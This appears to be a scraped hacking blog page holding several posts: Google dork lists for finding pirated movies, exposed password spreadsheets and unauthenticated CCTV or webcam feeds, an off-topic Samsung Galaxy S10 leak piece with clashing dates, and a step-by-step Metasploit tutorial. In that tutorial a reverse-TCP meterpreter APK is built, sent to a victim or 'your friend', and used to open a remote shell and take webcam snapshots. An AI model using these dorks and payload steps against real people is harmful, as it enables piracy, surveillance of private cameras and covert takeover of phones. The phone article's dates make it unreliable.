BREAKING NEWS
latest

ADS

ADS

Hacking Tools

Hacking Tools
Showing posts with label Latest Hack. Show all posts
Showing posts with label Latest Hack. Show all posts

How to download any movie easily

How to find any file download link easily by using google dorks
This is all about how to download hindi movies in full hd bluray, this is best best method than torrent. You can download hollywood movies as well. This is the google dorks technique to download any movies.



1. Download Bollywood hindi movies exter these google doeks on google and click on results


intext:"index of" hindi movies
intext:"index of" bollywood hindi movies
intext :"index of" movies



2. Download any Hollywood Movie

intext:"index of" hollywood movie name 



3. example to download hindi movies

intext:"index of" Dumbo download

intext:"index of" alita:battle angel download

intext:"index of" How to train your dragon : The hidden world download

intext:"index of" The Wandering Earth download

intext:"index of" Captain Marvel download

intext:"index of" Avengers: Endgame download 

intext:"index of" gully boy download

intext:"index of" URI download

intext:"index of" manikarnika download

intext:"index of" ek ladki ko dekha to aisa laga

intext:"index of" thackeray download 

intext:"index of" kesari download

intext:"index of" super 30 download

intext:"index of" amavas download

intext:"index of" Brahmastra download

intext:"index of" student of the year 2 download

intext:"index of" kalank download



intext:"index of" Luka Chuppi download

intext:"index of" Why Cheat India download

intext:"index of" Total Dhamaal download

intext:"index of" Avengers End game download

intext:"index of" Bharat download

intext:"index of" Badhaai ho download

intext:"index of" Setters Download

intext:"index of" Student of the year 2 download

intext:"index of" De De pyar de download

intext:"index of" Mental Hai kya download

intext:"index of" India's Most wanted download

intext:"index of" The Tashkent Files download

intext:"index of" Romeo Akbar Walter download

intext:"index of" Narendra Modi PM download

intext:"index of" Junglee Download

intext:"index of" Kesari Download

intext:"index of" Badla Download

intext:"index of" Total Dhamaal Download

intext:"index of" Thackeray Downlaod

intext:"index of" Simmba Download

intext:"index of" Kedarnath Download

intext:"index of" Stree Download

intext:"index of" Dhadak download


Now you can replace any file name instead of movie name








Google Hacking Database GHDB

Google Hacking Database

Google dork queries are used by IT officers, Security administrators and hackers. Security administrators use it in order to find vulnerability in their websites or server. Queries can be used as some sort of security tools but hackers can used them for finding vulnerabilities in a server or website.
google hacking database



Google hacking refers to art of reading complex search engine queries. Google has developed a few search parameters in order to improve targeted search. But they are abused by hackers to search for information and websites that are vulnerable to a numerous exploits and vulnerabilities and using which a hacker may be able to gather some very interesting information, including passwords, and discovering pages containing login portals, space containing network, advisories, vulnerable software, finding files, and directories that shouldn’t be visible. 
This can be accomplished with Google hacking database (GHDB) also called Database of queries to identify sensitive data and Google operator can help finding required info by avoiding irrelevant data and using advanced Google operators, attackers can locate specific string of text, specific version of vulnerable applications.

Google hacking database is set up by the offensive security people, the ones behind the famous BackTrack distro. Google hacking database has a list of many Google dorks that could be used to find usernames, passwords, e-mail list, password hashes, and other important information.
https://www.exploit-db.com/google-hacking-database/
google hacking database

HOW GOOGLE SEARCH IS USED FOR HACKING
Google allows the use of certain operators to help refine searches. The use of advanced operators is very simple as long as attention is given to the syntax. The basic format is: 
operator:search_term

google hacking database





Some dork queries from Google hacking database 
·      Search for confidential Excel spreadsheets the company inadvertently posted online by typing into Google search
filetype:xlssite:zaconfidential



google hacking database


·      To find spreadsheets full of passwords in Russia type into Google 
filetype:xlssite:ru login.
(Even on websites written in non-English languages the terms login, user id and password are generally written in English)


google hacking database


·      Command to exploit misconfigured web servers that list the contents of directories not intended to be on the web  
intitle:"index of"site:kr password


·      This dork allows anyone to explore the Images and photos uploaded and saved in Directories from Nikon DSLRs and Camera

inurl:htm -inurl:htmlintitle:"index of" NIKON

So these are just very few of the dorks that I mentioned here. GHDB is so full of dorks which can be used for various other purposes.

Google dork queryis a search string that uses advanced search operators to find information that is not readily available on a website. 



SOME BASIC PARAMETERS:
Some basic parameters are shown in the image below using which desired information can be retrieved using Google search engine.


Site: find web pages on a specific domain. 
Example -> site:alibaba.com



link:search webpages having a link to a specific URL
Basic syntax-> link:url
For example -> link:alibaba.com



Filetype: search only within files with specific extensions.
Basic syntax-> Filetype:search_term.extension type
Example->Filetype:cooking.pdfwill show only those results for pdf file related with cooking.


Finding Directory listings

Directory listing: Directory listing is a web server function that displays a list of all the files when there is not an index file, such as index.php and default.asp in a specific website directory. 

Directory listings Vulnerability: Due to the vulnerability directory may expose such files that are not normally exposed through links on the web site.
Basic syntax-> Inurl:_____Intitle:index ofsite:_____
For example ->Inurl:musicIntitle:index ofsite:us



USING DORKS AVAILABLE ON GOOGLE HACKING DATABASE TO GET NETWORK CCTV CAMERAS 

To get unsecured Cameras using GHDB
Step1:Open exploit database (https://www.exploit-db.com/google-hacking-database/) in browser. Type cctv in search box and press search.








Samsung galaxy s10 Features | Samsung Galaxy Release date Dec 2018 | Official Accessories,Prices Leaked

Samsung galaxy s10 Leaked Price in December 2018 | Release date and Everything you Need to know

Samsung Galaxy S10 Price in India, Full Specs, Samsung Galaxy S10 Price in India, Full Specs, Samsung Galaxy S10 - Full phone specifications, Samsung Galaxy S10 - Price, Full Specifications, Samsung Galaxy S10 (Black, 8GB RAM, 128GB Storage) ,Samsung Galaxy S10 price, specifications, features, comparison, Samsung Galaxy S10 5G price, specifications, features, comparison, Samsung Galaxy S10: Everything you need to know!, Buy Samsung Galaxy S10, S10e & S10 Plus, Samsung Galaxy S10 5G Deals and Features, Samsung Galaxy S10 (Prism Black, 128 GB) Online 

In a Recent News, Gizmodo has first Leaked Samsung will be launching the Galaxy S10 on February 20, 2018 and it will go on online sale as soon as March 8, 2018. There is a week earlier than the Galaxy S9, a mobile which was a month earlier than the Galaxy S8 in the market.



As positive about this news, Gizmodo has the information about samsung s10 pricing also. The Gizmodo released the price of samsung s10 is upto $1,750. Price can increase as the time.

 Features : According to storage 
Storage : 128 GB
Price : $845
and 
Storage : 512 GB
Price : $1009 
Features Of Samsung Galaxy s10 Plus :
Storage : 128 GB
Price : $1,135
Storage : 512 GB 
Price : $1390 
Storage : 1 TB
Price : $1,750 
The Gud news for us Persons because Prices are less in US than UK, Because of extra taxes. The Samsung Galaxy s10 Price in UK is £739.





CPU: Snapdragon 855 and Exynos 9820 


  • Samsung announced in Feb. that Samsung invests 5.6 billion in a new factory to make 7- nanometer chipsets.
  • Snapdragon-powered Galaxy  typically launch in North America. 
                               




  •  The Snapdragon 855 brings ultrasonic fingerprint recognition 
  • multi-gigabit 5G to Android's premier chipset. 
  • The new Spectra 380 image signal processor is the very attractive feature that delivers hardware-accelerated computational photography in samsung s10.
  • The new AI engine will reportedly make local machine learning three times faster than on the Snapdragon 845.



Fingerprint sensor In-display Screen

The Galaxy S10's in-display Screen fingerprint sensor product will be Delivered by Qualcomm, and it delivers the third generation of the company's ultrasonic technology. 









The in-display Screen could be accompanied by a bold new technology  in the display that transmits audio waves through vibrations in the phone's glass screen. According to ETNews,  if Company truly designs incorporates , which claims Samsung rely on this system instead the Galaxy S10's front-facing speaker. 

New OneUI software experience
Samsung introduced a new user interface OneUI that will be designed for upcoming samsung galaxy s series and that would replace the Android skin. This is currently in beta version on samsung galaxy s9. OneUI is expected to be a part i samsung s10, Because samsung designed it to implement it in Big Screen.

Faster RAM and UFS 3.0 storage

  • It supposed to be faster RAM in galaxy s10,  and storage modules than what is available in present handsets today.
  • Samsung will start producing LPDDR5 and UFS 3.0 chips from this year. 
  • we may wait another year for LPDDR5 RAM to reach in Samsung's smartphones, which shared that Samsung has confirmed its first UFS 3.0 products will ship in the first half of 2019 at 128GB, 256GB and 512GB sizes. 
Other Features 

A multitude of cameras
A 3D face scanner

Samsung Galaxy S10 Price in India, Full Specs, Samsung Galaxy S10 Price in India, Full Specs, Samsung Galaxy S10 - Full phone specifications, Samsung Galaxy S10 - Price, Full Specifications, Samsung Galaxy S10 (Black, 8GB RAM, 128GB Storage) ,Samsung Galaxy S10 price, specifications, features, comparison, Samsung Galaxy S10 5G price, specifications, features, comparison, Samsung Galaxy S10: Everything you need to know!, Buy Samsung Galaxy S10, S10e & S10 Plus, Samsung Galaxy S10 5G Deals and Features, Samsung Galaxy S10 (Prism Black, 128 GB) Online 


How to hack cctv and web camera using google dorks

How to hack cctv  camera online using google dorks

This is the complete tutorial for How to hack cctv camera and public web camera which are working on public ip address without authentication.
here are all the google dorks for finding vulnerable indian cctv cameras and foreigners cctv vulnerable cameras.we can take over full control of these type of vulnerable cameras in our system.
Its a very simple technique to hack vulnerable cctv cameras.






BEST ETHICAL HACKING TRAINING IN DELHI






allintitle: “Network Camera NetworkCamera” Network cameras

intitle:Axis 2400 video server Mostly security cameras, car parks, colleges, clubs, bars, etc.

intitle:axis intitle:”video server” Mostly security cameras, car parks, colleges, bars, ski slopes etc.

intitle:”EvoCam” inurl:”webcam.html” Mostly European security cameras

intitle:”Live NetSnap Cam-Server feed” Network cameras, private and non private web cameras

intitle:”Live View / – AXIS” Mostly security cameras, car parks, colleges etc.

intitle:”LiveView / – AXIS” | inurl:view/view.shtml Mostly security cameras, car parks, colleges etc.

intitle:liveapplet Mostly security cameras, car parks, colleges, clubs, bars etc.

intitle:snc-cs3 inurl:home/ Mostly security cameras, swimming pools and more etc.

intitle:”snc-rz30 home” Mostly security cameras, shops, car parks

intitle:snc-z20 inurl:home/ Mostly security cameras, swimming pools and more etc.

intitle:”WJ-NT104 Main” Mostly security cameras, shops, car parks

inurl:LvAppl intitle:liveapplet Mostly security cameras, car parks, colleges etc.

inurl:indexFrame.shtml “Axis Video Server” Mostly security cameras, car parks, colleges etc.

inurl:lvappl A huge list of webcams around the world, mostly security cameras, car parks, colleges
etc.
inurl:axis-cgi/jpg Mostly security cameras

inurl:indexFrame.shtml Axis Mostly security cameras, car parks, colleges etc.

inurl:”MultiCameraFrame?Mode=Motion” Mostly security cameras, pet shops, colleges etc.

inurl:/view.shtml Mostly security cameras, car parks, colleges etc.

inurl:/view/index.shtml Mostly security cameras, airports, car parks, back gardens, traffic cams etc.

inurl:viewerframe?mode= Network cameras, mostly private webcams etc.

inurl:”viewerframe?mode=motion” Network cameras

inurl:ViewerFrame?Mode=RefreshMostly security cameras, parks, bird tables etc.

Other searches:

control/userimage.html

liveapplet

inurl:indexframe.shtml

inurl:”view/index.shtml”

inurl:”view/indexFrame.shtml”

inurl:view/view.shtml

inurl:/view/view.shtml?videos=

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Motion

inurl:ViewerFrame?Mode=Refresh

In Title:

intitle:”live view” intitle:axis

intitle:”EvoCam” inurl:”webcam.html”

intitle:”i-Catcher Console – Web Monitor”

intitle:”Live NetSnap Cam-Server feed”

allintitle:liveapplet

intitle:liveapplet

intitle:”netcam live image”

intitle:”snc-rz30 home”

intitle:”WJ-NT104 Main”


In URL:

inurl:axis-cgi/jpg

inurl:indexFrame.shtml Axis

inurl:indexFrame.shtml “Axis Video Server”

inurl:lvappl live webcams

inurl:LvAppl intitle:liveapplet

inurl:”MultiCameraFrame?Mode=Motion”

inurl:/view:shtml

inurl:/view/index.shtml

inurl:view/indexframe.shtml


inurl:view/view.shtml

viewerframe?mode=

inurl:”viewerframe?mode=motion”

inurl:ViewerFrame?Mode=Refresh

Two searches in one order:


intitle:”live view” intitle:axis (two searches in one order)

intitle:axis intitle:”video server”

intitle:liveapplet inurl:LvAppl

intitle:”Live View / – AXIS” | inurl:view/view.shtml

intitle:start inurl:cgistart




Android mobile hacking by metasploit in kali linux

Android mobile hacking by metasploit in kali linux

Metasploit is a kali linux platform to exploiting the machines.Metasploit have many explois & payloads What some don’t know is that Metasploit has added some functionality for security testing Android Devices and windows as well linux operating system. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.



How to hack android devices????


How to hack mobile???


mobile hacking complete tutorial






CERTIFIED ETHICAL HACKER BOOTCAMPS

We will do this by creating a “malicious” Android program in apk extension, an APK file, so that once it is run by our victim, it will connect out to our attacking machine running Metasploit to the android device. We will set Metasploit up to listen mode for the incoming connection from android device and once it sees it, create a fully functional remote shell to the android device.


First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk







The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it with this file we can connect to any android device in our local area network. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port address also if you would like.

Once this is run, a file called “app.apk” will be created:







2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
Then just type exploit to start the handler:










6. Run the App on your Android device which we created in kali linix or you can give it to your friend. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created in attackers kali linux machine.

On your Metaploit system you should see this:






An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:










9. You can see the processes running by typing, “ps”:





You can have the Android device remotely by using Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

download here android hacking commands


Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One remote trojan app installed by a user and an attacker can get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands: